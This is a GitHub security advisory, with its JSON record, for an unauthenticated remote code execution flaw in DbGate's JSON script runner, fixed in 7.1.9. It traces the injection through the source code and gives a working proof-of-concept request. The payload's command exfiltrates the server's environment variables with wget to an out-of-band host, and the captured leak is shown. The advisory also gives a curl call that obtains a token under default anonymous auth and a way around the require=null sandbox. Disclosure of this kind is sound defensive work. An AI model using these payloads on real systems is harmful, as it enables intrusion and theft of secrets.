GHSA-8V3Q-9VMX-36VC

Vulnerability from github – Published: 2026-06-05 16:25 – Updated: 2026-06-05 16:25
VLAI
Summary
DbGate: Unauthenticated Remote Code Execution via JSON Script Runner
Details

Summary

DbGate's JSON script runner (POST /runners/start) allows remote code execution via code injection in the functionName parameter of JSON script assign commands. The functionName value is interpolated directly into dynamically generated JavaScript source code via string concatenation. The generated code is then executed in a forked Node.js child process.

Details

Step 1: User Input Entry Point

File: packages/api/src/controllers/runners.js - start() method

The /runners/start endpoint accepts a POST body containing a script object. When script.type == 'json', the request follows a different code path than raw shell scripts:

async start({ script }, req) {
    if (script.type == 'json') {
        if (!platformInfo.isElectron) {
            if (!checkSecureDirectoriesInScript(script)) {
                return { errorMessage: 'Unallowed directories in script' };
            }
        }
        logJsonRunnerScript(req, script);
        const js = await jsonScriptToJavascript(script);
        return this.startCore(runid, scriptTemplate(js, false));
    }

This path skips: 1. The run-shell-script permission check 2. The allowShellScripting platform-level check

The only validation performed is checkSecureDirectoriesInScript(), which props.fileName values


Step 2: JSON-to-JavaScript Conversion (Injection Point)

File: packages/tools/src/ScriptWriter.ts - assignCore() method

The JSON script's commands array contains objects with type: "assign". The assignCore method generates JavaScript by direct string concatenation of user-controlled values:

assignCore(variableName, functionName, props) {
    this._put(`const ${variableName} = await ${functionName}(${JSON.stringify(props)});`);
}

Both variableName and functionName are attacker-controlled values taken directly from the JSON request body and interpolated into the generated JavaScript source code.


Step 3: Function Name Compilation

File: packages/tools/src/packageTools.ts - compileShellApiFunctionName()

Before interpolation, functionName passes through this function:

export function compileShellApiFunctionName(functionName) {
    const nsMatch = functionName.match(/^([^@]+)@([^@]+)/);
    if (nsMatch) {
        return `${_camelCase(nsMatch[2])}.shellApi.${nsMatch[1]}`;
    }
    return `dbgateApi.${functionName}`;
}

An attacker supplying functionName: "x;MALICIOUS_CODE;//" gets:

dbgateApi.x;MALICIOUS_CODE;//

This is syntactically valid JavaScript: dbgateApi.x evaluates (and is discarded), MALICIOUS_CODE executes, and // comments out the trailing (${JSON.stringify(props)});.


Step 4: Generated JavaScript Template

The complete generated script that gets executed:

const dbgateApi = require(process.env.DBGATE_API);
require = null;
async function run() {
    const x = await dbgateApi.x;process.mainModule.require('child_process').execSync('wget <attacker host>');//({});
    await dbgateApi.finalizer.run();
}
dbgateApi.runScript(run);

Step 5: Execution via child_process.fork()

File: packages/api/src/controllers/runners.js - startCore() method

The generated JavaScript string is written to a temporary file and executed as a new Node.js process via child_process.fork(). This provides the attacker with a full Node.js runtime, including access to process, child_process, fs, net, and all other Node.js built-in modules.

The require = null sandbox can be bypassed via: - process.mainModule.require() - separate reference unaffected by the null assignment - module.constructor._load() - internal module loader, also unaffected


Additional Injection Points

The same unsanitised string interpolation pattern exists in:

Endpoint Parameter File
POST /runners/start functionName in assign commands ScriptWriter.ts - assignCore()
POST /runners/start variableName in assign commands ScriptWriter.ts - assignCore()
POST /runners/load-reader functionName parameter ScriptWriter.ts - loaderScriptTemplate

PoC

POST /runners/start HTTP/1.1
Host: <dbgate-instance>:3000
Authorization: Bearer <token>
Content-Type: application/json

{
  "script": {
    "type": "json",
    "commands": [
      {
        "type": "assign",
        "variableName": "x",
        "functionName": "x;process.mainModule.require('child_process').execSync('wget --post-data \"$(env 2>1&)\" <out of band host>');//",
        "props": {}
      }
    ],
    "packageNames": []
  }
}

The request to the out of band host was as follows:

POST / HTTP/1.1
Host: <out of band host>
User-Agent: Wget/1.21.3
Accept: */*
Accept-Encoding: identity
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 251

NODE_VERSION=22.22.2
HOSTNAME=4714c7a7405f
YARN_VERSION=1.22.22
HOME=/root
TERM=xterm
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
DBGATE_API=/home/dbgate-docker/bundle.js
PWD=/root/.dbgate/run/16c2e85a-8512-4a7e-8678-391637bbdc2c

A bearer token is required to reach the endpoint, but in what appears to be the default deployment, authentication is disabled. Authentication needs to be explicitly set via environment variables. If this has not been explicitly set, per the defaults, a token can be retrieved using:

curl -sk -H "Content-Type: application/json"   -d '{"amoid":"none"}'   <dbgate-instance>:3000/auth/login

Impact

Scenario Impact CVSS Score CVSS Vector
Anonymous auth mode (default deployment) (authProvider: "Anonymous") Unauthenticated RCE 10.0 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Authenticated deployment Authenticated RCE - any user with API access 9.9 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Timeline

Date Event
2026-03-31 Vulnerability discovered
2026-04-07 Advisory report prepared and submitted to maintainer
2026-04-22 Fix released (v7.1.9)
2026-04-24 Maintainer acknowledgment
2026-05-20 Public disclosure

Acknowledgements

  • Discovery assisted by Neo from @ProjectDiscovery
  • Initial research direction inspired by @H0j3n — https://github.com/runZeroInc/nuclei-templates/blob/main/http/vulnerabilities/dbgate-unauth-rce.yaml
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 7.1.8"
      },
      "package": {
        "ecosystem": "npm",
        "name": "dbgate-serve"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.1.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-47668"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1188",
      "CWE-20",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-05T16:25:23Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\nDbGate\u0027s JSON script runner (`POST /runners/start`) allows remote code execution via code injection in the `functionName` parameter of JSON script `assign` commands. The `functionName` value is interpolated directly into dynamically generated JavaScript source code via string concatenation. The generated code is then executed in a forked Node.js child process.\n\n### Details\n#### Step 1: User Input Entry Point\n\n**File:** `packages/api/src/controllers/runners.js` - `start()` method\n\nThe `/runners/start` endpoint accepts a POST body containing a `script` object. When `script.type == \u0027json\u0027`, the request follows a different code path than raw shell scripts:\n\n```javascript\nasync start({ script }, req) {\n    if (script.type == \u0027json\u0027) {\n        if (!platformInfo.isElectron) {\n            if (!checkSecureDirectoriesInScript(script)) {\n                return { errorMessage: \u0027Unallowed directories in script\u0027 };\n            }\n        }\n        logJsonRunnerScript(req, script);\n        const js = await jsonScriptToJavascript(script);\n        return this.startCore(runid, scriptTemplate(js, false));\n    }\n```\nThis path skips:\n1. The `run-shell-script` permission check\n2. The `allowShellScripting` platform-level check\n\nThe only validation performed is `checkSecureDirectoriesInScript()`, which `props.fileName` values\n\n---\n\n#### Step 2: JSON-to-JavaScript Conversion (Injection Point)\n\n**File:** `packages/tools/src/ScriptWriter.ts` - `assignCore()` method\n\nThe JSON script\u0027s `commands` array contains objects with `type: \"assign\"`. The `assignCore` method generates JavaScript by direct string concatenation of user-controlled values:\n\n```typescript\nassignCore(variableName, functionName, props) {\n    this._put(`const ${variableName} = await ${functionName}(${JSON.stringify(props)});`);\n}\n```\n\nBoth `variableName` and `functionName` are attacker-controlled values taken directly from the JSON request body and interpolated into the generated JavaScript source code.\n\n---\n\n#### Step 3: Function Name Compilation\n\n**File:** `packages/tools/src/packageTools.ts` - `compileShellApiFunctionName()`\n\nBefore interpolation, `functionName` passes through this function:\n\n```typescript\nexport function compileShellApiFunctionName(functionName) {\n    const nsMatch = functionName.match(/^([^@]+)@([^@]+)/);\n    if (nsMatch) {\n        return `${_camelCase(nsMatch[2])}.shellApi.${nsMatch[1]}`;\n    }\n    return `dbgateApi.${functionName}`;\n}\n```\n\nAn attacker supplying `functionName: \"x;MALICIOUS_CODE;//\"` gets:\n```\ndbgateApi.x;MALICIOUS_CODE;//\n```\n\nThis is syntactically valid JavaScript: `dbgateApi.x` evaluates (and is discarded), `MALICIOUS_CODE` executes, and `//` comments out the trailing `(${JSON.stringify(props)});`.\n\n---\n\n#### Step 4: Generated JavaScript Template\n\nThe complete generated script that gets executed:\n\n```javascript\nconst dbgateApi = require(process.env.DBGATE_API);\nrequire = null;\nasync function run() {\n    const x = await dbgateApi.x;process.mainModule.require(\u0027child_process\u0027).execSync(\u0027wget \u003cattacker host\u003e\u0027);//({});\n    await dbgateApi.finalizer.run();\n}\ndbgateApi.runScript(run);\n```\n\n#### Step 5: Execution via child_process.fork()\n\n**File:** `packages/api/src/controllers/runners.js` - `startCore()` method\n\nThe generated JavaScript string is written to a temporary file and executed as a new Node.js process via `child_process.fork()`. This provides the attacker with a full Node.js runtime, including access to `process`, `child_process`, `fs`, `net`, and all other Node.js built-in modules.\n\nThe `require = null` sandbox can be bypassed via:\n- `process.mainModule.require()` - separate reference unaffected by the null assignment\n- `module.constructor._load()` - internal module loader, also unaffected\n---\n\n#### Additional Injection Points\n\nThe same unsanitised string interpolation pattern exists in:\n\n| Endpoint | Parameter | File |\n|----------|-----------|------|\n| `POST /runners/start` | `functionName` in assign commands | `ScriptWriter.ts` - `assignCore()` |\n| `POST /runners/start` | `variableName` in assign commands | `ScriptWriter.ts` - `assignCore()` |\n| `POST /runners/load-reader` | `functionName` parameter | `ScriptWriter.ts` - `loaderScriptTemplate` |\n\n### PoC\n```http\nPOST /runners/start HTTP/1.1\nHost: \u003cdbgate-instance\u003e:3000\nAuthorization: Bearer \u003ctoken\u003e\nContent-Type: application/json\n\n{\n  \"script\": {\n    \"type\": \"json\",\n    \"commands\": [\n      {\n        \"type\": \"assign\",\n        \"variableName\": \"x\",\n        \"functionName\": \"x;process.mainModule.require(\u0027child_process\u0027).execSync(\u0027wget --post-data \\\"$(env 2\u003e1\u0026)\\\" \u003cout of band host\u003e\u0027);//\",\n        \"props\": {}\n      }\n    ],\n    \"packageNames\": []\n  }\n}\n```\n\nThe request to the out of band host was as follows:\n\n```http\nPOST / HTTP/1.1\nHost: \u003cout of band host\u003e\nUser-Agent: Wget/1.21.3\nAccept: */*\nAccept-Encoding: identity\nConnection: Keep-Alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 251\n\nNODE_VERSION=22.22.2\nHOSTNAME=4714c7a7405f\nYARN_VERSION=1.22.22\nHOME=/root\nTERM=xterm\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\nDBGATE_API=/home/dbgate-docker/bundle.js\nPWD=/root/.dbgate/run/16c2e85a-8512-4a7e-8678-391637bbdc2c\n```\n\n---\n\nA bearer token is required to reach the endpoint, but in what appears to be the default deployment, authentication is disabled. Authentication needs to be explicitly set via environment variables. If this has not been explicitly set, per the defaults, a token can be retrieved using:\n\n```bash\ncurl -sk -H \"Content-Type: application/json\"   -d \u0027{\"amoid\":\"none\"}\u0027   \u003cdbgate-instance\u003e:3000/auth/login\n```\n\n### Impact\n\n| Scenario | Impact | CVSS Score | CVSS Vector | \n|----------|--------|--------|--------|\n| Anonymous auth mode (default deployment) (`authProvider: \"Anonymous\"`) | Unauthenticated RCE | 10.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |\n| Authenticated deployment | Authenticated RCE - any user with API access |  9.9 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |\n\n### Timeline\n\n| Date | Event |\n|------|-------|\n| 2026-03-31 | Vulnerability discovered |\n| 2026-04-07 | Advisory report prepared and submitted to maintainer |\n| 2026-04-22 | Fix released (v7.1.9) |\n| 2026-04-24 | Maintainer acknowledgment |\n| 2026-05-20 | Public disclosure |\n\n### Acknowledgements\n\n- Discovery assisted by Neo from @ProjectDiscovery\n- Initial research direction inspired by @H0j3n \u2014 https://github.com/runZeroInc/nuclei-templates/blob/main/http/vulnerabilities/dbgate-unauth-rce.yaml",
  "id": "GHSA-8v3q-9vmx-36vc",
  "modified": "2026-06-05T16:25:23Z",
  "published": "2026-06-05T16:25:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dbgate/dbgate/security/advisories/GHSA-8v3q-9vmx-36vc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dbgate/dbgate"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dbgate/dbgate/releases/tag/v7.1.9"
    },
    {
      "type": "WEB",
      "url": "https://github.com/runZeroInc/nuclei-templates/blob/main/http/vulnerabilities/dbgate-unauth-rce.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "DbGate: Unauthenticated Remote Code Execution via JSON Script Runner"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…